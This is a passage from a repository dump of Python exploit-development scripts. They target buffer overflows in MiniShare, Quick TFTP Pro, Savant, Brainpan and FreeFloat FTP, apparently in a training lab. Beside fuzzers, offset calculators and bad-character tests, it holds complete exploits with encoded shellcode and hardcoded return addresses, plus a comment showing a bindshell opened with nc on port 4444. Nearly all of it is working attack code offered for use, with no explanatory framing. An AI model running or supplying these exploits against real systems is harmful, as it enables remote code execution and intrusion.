s.connect(('11.11.11.7',80)) 6 | buff="GET " 7 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 8 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | buff+="A"*1787 + badchars 24 | buff+=" HTTP/1.1\r\n\r\n" 25 | s.send(buff) 26 | s.close() 27 | -------------------------------------------------------------------------------- /minisharewin7/minisharesploit.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/share/python 3 | import socket,sys 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | s.connect(('11.11.11.9',80)) 6 | buff="GET " 7 | #0095F1B1 8 | shellcode = "" 9 | shellcode += "\xd9\xf6\xd9\x74\x24\xf4\x58\xba\xd0\x6a\xbf\x15" 10 | shellcode += "\x33\xc9\xb1\x53\x31\x50\x17\x83\xc0\x04\x03\x80" 11 | shellcode += "\x79\x5d\xe0\xdc\x96\x23\x0b\x1c\x67\x44\x85\xf9" 12 | shellcode += "\x56\x44\xf1\x8a\xc9\x74\x71\xde\xe5\xff\xd7\xca" 13 | shellcode += "\x7e\x8d\xff\xfd\x37\x38\x26\x30\xc7\x11\x1a\x53" 14 | shellcode += "\x4b\x68\x4f\xb3\x72\xa3\x82\xb2\xb3\xde\x6f\xe6" 15 | shellcode += "\x6c\x94\xc2\x16\x18\xe0\xde\x9d\x52\xe4\x66\x42" 16 | shellcode += "\x22\x07\x46\xd5\x38\x5e\x48\xd4\xed\xea\xc1\xce" 17 | shellcode += "\xf2\xd7\x98\x65\xc0\xac\x1a\xaf\x18\x4c\xb0\x8e" 18 | shellcode += "\x94\xbf\xc8\xd7\x13\x20\xbf\x21\x60\xdd\xb8\xf6" 19 | shellcode += "\x1a\x39\x4c\xec\xbd\xca\xf6\xc8\x3c\x1e\x60\x9b" 20 | shellcode += "\x33\xeb\xe6\xc3\x57\xea\x2b\x78\x63\x67\xca\xae" 21 | shellcode += "\xe5\x33\xe9\x6a\xad\xe0\x90\x2b\x0b\x46\xac\x2b" 22 | shellcode += "\xf4\x37\x08\x20\x19\x23\x21\x6b\x76\x80\x08\x93" 23 | shellcode += "\x86\x8e\x1b\xe0\xb4\x11\xb0\x6e\xf5\xda\x1e\x69" 24 | shellcode += "\xfa\xf0\xe7\xe5\x05\xfb\x17\x2c\xc2\xaf\x47\x46" 25 | shellcode += "\xe3\xcf\x03\x96\x0c\x1a\xb9\x9e\xab\xf5\xdc\x63" 26 | shellcode += "\x0b\xa6\x60\xcb\xe4\xac\x6e\x34\x14\xcf\xa4\x5d" 27 | shellcode += "\xbd\x32\x47\x70\x62\xba\xa1\x18\x8a\xea\x7a\xb4" 28 | shellcode += "\x68\xc9\xb2\x23\x92\x3b\xeb\xc3\xdb\x2d\x2c\xec" 29 | shellcode += "\xdb\x7b\x1a\x7a\x50\x68\x9e\x9b\x67\xa5\xb6\xcc" 30 | shellcode += "\xf0\x33\x57\xbf\x61\x43\x72\x57\x01\xd6\x19\xa7" 31 | shellcode += "\x4c\xcb\xb5\xf0\x19\x3d\xcc\x94\xb7\x64\x66\x8a" 32 | shellcode += "\x45\xf0\x41\x0e\x92\xc1\x4c\x8f\x57\x7d\x6b\x9f" 33 | shellcode += "\xa1\x7e\x37\xcb\x7d\x29\xe1\xa5\x3b\x83\x43\x1f" 34 | shellcode += "\x92\x78\x0a\xf7\x63\xb3\x8d\x81\x6b\x9e\x7b\x6d" 35 | shellcode += "\xdd\x77\x3a\x92\xd2\x1f\xca\xeb\x0e\x80\x35\x26" 36 | shellcode += "\x8b\xb0\x7f\x6a\xba\x58\x26\xff\xfe\x04\xd9\x2a" 37 | shellcode += "\x3c\x31\x5a\xde\xbd\xc6\x42\xab\xb8\x83\xc4\x40" 38 | shellcode += "\xb1\x9c\xa0\x66\x66\x9c\xe0" 39 | 40 | 41 | buff+="A"*1787 + "\xB1\xF1\x95\x00" + "\x90" * 20 + shellcode 42 | buff+=" HTTP/1.1\r\n\r\n" 43 | s.send(buff) 44 | s.close() 45 | -------------------------------------------------------------------------------- /minisharewin7/minishareverifyoffset.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/share/python 3 | import socket,sys 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | s.connect(('11.11.11.7',80)) 6 | buff="GET " 7 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 8 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | buff+="A"*1787 + badchars 24 | buff+=" HTTP/1.1\r\n\r\n" 25 | s.send(buff) 26 | s.close() 27 | -------------------------------------------------------------------------------- /quickftppro/qttftp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Quick TFTP Pro 2.1 SEH Overflow (0day) 3 | # Tested on Windows XP SP2. 4 | # Coded by Mati Aharoni 5 | # muts..at..offensive-security.com 6 | # http://www.offensive-security.com/0day/quick-tftp-poc.py.txt 7 | ######################################################### 8 | # bt ~ # quickftp.py 9 | # [*] Quick TFTP Pro 2.1 SEH Overflow (0day) 10 | # [*] http://www.offensive-security.com 11 | # [*] Sending evil packet, ph33r 12 | # [*] Check port 4444 for bindshell 13 | # bt ~ # nc -v 172.16.167.130 4444 14 | # (UNKNOWN) [172.16.167.130] 4444 (krb524) open 15 | # Microsoft Windows XP [Version 5.1.2600] 16 | # (C) Copyright 1985-2001 Microsoft Corp. 17 | # 18 | # C:\Documents and Settings\Administrator> 19 | ########################################################## 20 | import socket 21 | import sys 22 | 23 | print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)" 24 | print "[*] http://www.offensive-security.com" 25 | 26 | host = '11.11.11.6' 27 | port = 69 28 | 29 | try: 30 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 31 | except: 32 | print "socket() failed" 33 | sys.exit(1) 34 | 35 | filename = "pwnd" 36 | 37 | # windows/shell_bind_tcp - 317 bytes 38 | # http://www.metasploit.com 39 | # EXITFUNC=thread, LPORT=4444 40 | 41 | 42 | mode = "A" * 1360 43 | 44 | muha = "\x00\x02" + filename+ "\0" + mode + "\0" 45 | 46 | print "[*] Sending evil packet, ph33r" 47 | s.sendto(muha, (host, port)) 48 | print "[*] Check port 4444 for bindshell" 49 | 50 | # milw0rm.com [2008-03-26] 51 | -------------------------------------------------------------------------------- /savant/savant1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="11.11.11.6" 5 | target_port=80 6 | 7 | badbuffer = "\x41" * 258 8 | httpmethod = "GET" 9 | 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) 14 | sock.send(sendbuf) 15 | sock.close() 16 | -------------------------------------------------------------------------------- /savant/savant2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="11.11.11.6" 5 | target_port=80 6 | badbuffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5") 7 | #badbuffer = "\x41" * 258 8 | httpmethod = "GET" 9 | #fuck this it requires an egghunter and other shit 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) 14 | sock.send(sendbuf) 15 | sock.close() 16 | -------------------------------------------------------------------------------- /second/brainpan/badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 6 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | 22 | #0x311712f3 23 | buffer = "A" * 524 + "B" * 4 + badchars 24 | try: 25 | print "sending evil buffer..." 26 | s.connect(('11.11.11.9',9999)) 27 | data = s.recv(1024) 28 | s.send(buffer + '\r\n') 29 | print "\nDone!" 30 | 31 | except: 32 | print "Count not connect to Brain!" 33 | 34 | -------------------------------------------------------------------------------- /second/brainpan/bpfuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | # create an array of buffers, while increasing them. 4 | buffer=["A"] 5 | counter = 100 6 | while len(buffer) <= 30: 7 | buffer.append("A"*counter) 8 | counter = counter + 200 9 | for string in buffer: 10 | print "Fuzzing PASS with %s bytes" % len(string) 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | connect = s.connect(('11.11.11.9',9999)) 13 | s.recv(1024) 14 | s.send(string + '\r\n') 15 | s.close() 16 | 17 | -------------------------------------------------------------------------------- /second/brainpan/offsetcalc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | buffer = "A" * 524 + "B" * 4 6 | 7 | try: 8 | print "sending evil buffer..." 9 | s.connect(('11.11.11.9',9999)) 10 | data = s.recv(1024) 11 | s.send(buffer + '\r\n') 12 | print "\nDone!" 13 | 14 | except: 15 | print "Count not connect to Brain!" 16 | 17 | -------------------------------------------------------------------------------- /second/brainpan/retaddress.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | nops = "\x90" * 16 6 | 7 | shellcode = "" 8 | shellcode += "\xbd\x3b\xe1\x23\xaf\xd9\xf6\xd9\x74\x24\xf4\x5a" 9 | shellcode += "\x2b\xc9\xb1\x52\x83\xc2\x04\x31\x6a\x0e\x03\x51" 10 | shellcode += "\xef\xc1\x5a\x59\x07\x87\xa5\xa1\xd8\xe8\x2c\x44" 11 | shellcode += "\xe9\x28\x4a\x0d\x5a\x99\x18\x43\x57\x52\x4c\x77" 12 | shellcode += "\xec\x16\x59\x78\x45\x9c\xbf\xb7\x56\x8d\xfc\xd6" 13 | shellcode += "\xd4\xcc\xd0\x38\xe4\x1e\x25\x39\x21\x42\xc4\x6b" 14 | shellcode += "\xfa\x08\x7b\x9b\x8f\x45\x40\x10\xc3\x48\xc0\xc5" 15 | shellcode += "\x94\x6b\xe1\x58\xae\x35\x21\x5b\x63\x4e\x68\x43" 16 | shellcode += "\x60\x6b\x22\xf8\x52\x07\xb5\x28\xab\xe8\x1a\x15" 17 | shellcode += "\x03\x1b\x62\x52\xa4\xc4\x11\xaa\xd6\x79\x22\x69" 18 | shellcode += "\xa4\xa5\xa7\x69\x0e\x2d\x1f\x55\xae\xe2\xc6\x1e" 19 | shellcode += "\xbc\x4f\x8c\x78\xa1\x4e\x41\xf3\xdd\xdb\x64\xd3" 20 | shellcode += "\x57\x9f\x42\xf7\x3c\x7b\xea\xae\x98\x2a\x13\xb0" 21 | shellcode += "\x42\x92\xb1\xbb\x6f\xc7\xcb\xe6\xe7\x24\xe6\x18" 22 | shellcode += "\xf8\x22\x71\x6b\xca\xed\x29\xe3\x66\x65\xf4\xf4" 23 | shellcode += "\x89\x5c\x40\x6a\x74\x5f\xb1\xa3\xb3\x0b\xe1\xdb" 24 | shellcode += "\x12\x34\x6a\x1b\x9a\xe1\x3d\x4b\x34\x5a\xfe\x3b" 25 | shellcode += "\xf4\x0a\x96\x51\xfb\x75\x86\x5a\xd1\x1d\x2d\xa1" 26 | shellcode += "\xb2\x2a\xb9\xa2\x40\x45\xbf\xb4\x55\xc9\x36\x52" 27 | shellcode += "\x3f\xe1\x1e\xcd\xa8\x98\x3a\x85\x49\x64\x91\xe0" 28 | shellcode += "\x4a\xee\x16\x15\x04\x07\x52\x05\xf1\xe7\x29\x77" 29 | shellcode += "\x54\xf7\x87\x1f\x3a\x6a\x4c\xdf\x35\x97\xdb\x88" 30 | shellcode += "\x12\x69\x12\x5c\x8f\xd0\x8c\x42\x52\x84\xf7\xc6" 31 | shellcode += "\x89\x75\xf9\xc7\x5c\xc1\xdd\xd7\x98\xca\x59\x83" 32 | shellcode += "\x74\x9d\x37\x7d\x33\x77\xf6\xd7\xed\x24\x50\xbf" 33 | shellcode += "\x68\x07\x63\xb9\x74\x42\x15\x25\xc4\x3b\x60\x5a" 34 | shellcode += "\xe9\xab\x64\x23\x17\x4c\x8a\xfe\x93\x7c\xc1\xa2" 35 | shellcode += "\xb2\x14\x8c\x37\x87\x78\x2f\xe2\xc4\x84\xac\x06" 36 | shellcode += "\xb5\x72\xac\x63\xb0\x3f\x6a\x98\xc8\x50\x1f\x9e" 37 | shellcode += "\x7f\x50\x0a" 38 | 39 | #0x311712f3 40 | buffer = "A" * 524 + "\xf3\x12\x17\x31" + nops + shellcode 41 | try: 42 | print "sending evil buffer..." 43 | s.connect(('11.11.11.9',9999)) 44 | data = s.recv(1024) 45 | s.send(buffer + '\r\n') 46 | print "\nDone!" 47 | 48 | except: 49 | print "Count not connect to Brain!" 50 | 51 | -------------------------------------------------------------------------------- /second/freefloatftp/fftp1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | 5 | evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 6 | 7 | #evil = "A"*1000 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | connect=s.connect(('11.11.11.6',21)) 10 | s.recv(1024) 11 | s.send('USER anonymous\r\n') 12 | s.recv(1024) 13 | s.send('PASS anonymous\r\n') 14 | s.recv(1024) 15 | s.send('MKD ' + evil + '\r\n') 16 | s.recv(1024) 17 | s.send('QUIT\r\n') 18 | s.close 19 | 20 | -------------------------------------------------------------------------------- /second/freefloatftp/fftp2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | 5 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 6 | #[*] Exact match at offset 247 7 | 8 | evil = "A" * 247 + "B" * 4 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | connect=s.connect(('11.11.11.6',21)) 11 | s.recv(1024) 12 | s.send('USER anonymous\r\n') 13 | s.recv(1024) 14 | s.send('PASS anonymous\r\n') 15 | s.recv(1024) 16 | s.send('MKD ' + evil + '\r\n') 17 | s.recv(1024) 18 | s.send('QUIT\r\n') 19 | s.close 20 | 21 | -------------------------------------------------------------------------------- /second/freefloatftp/fftp3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | # \x00 \x0a \x0d 5 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 6 | #[*] Exact match at offset 247 7 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" 8 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | 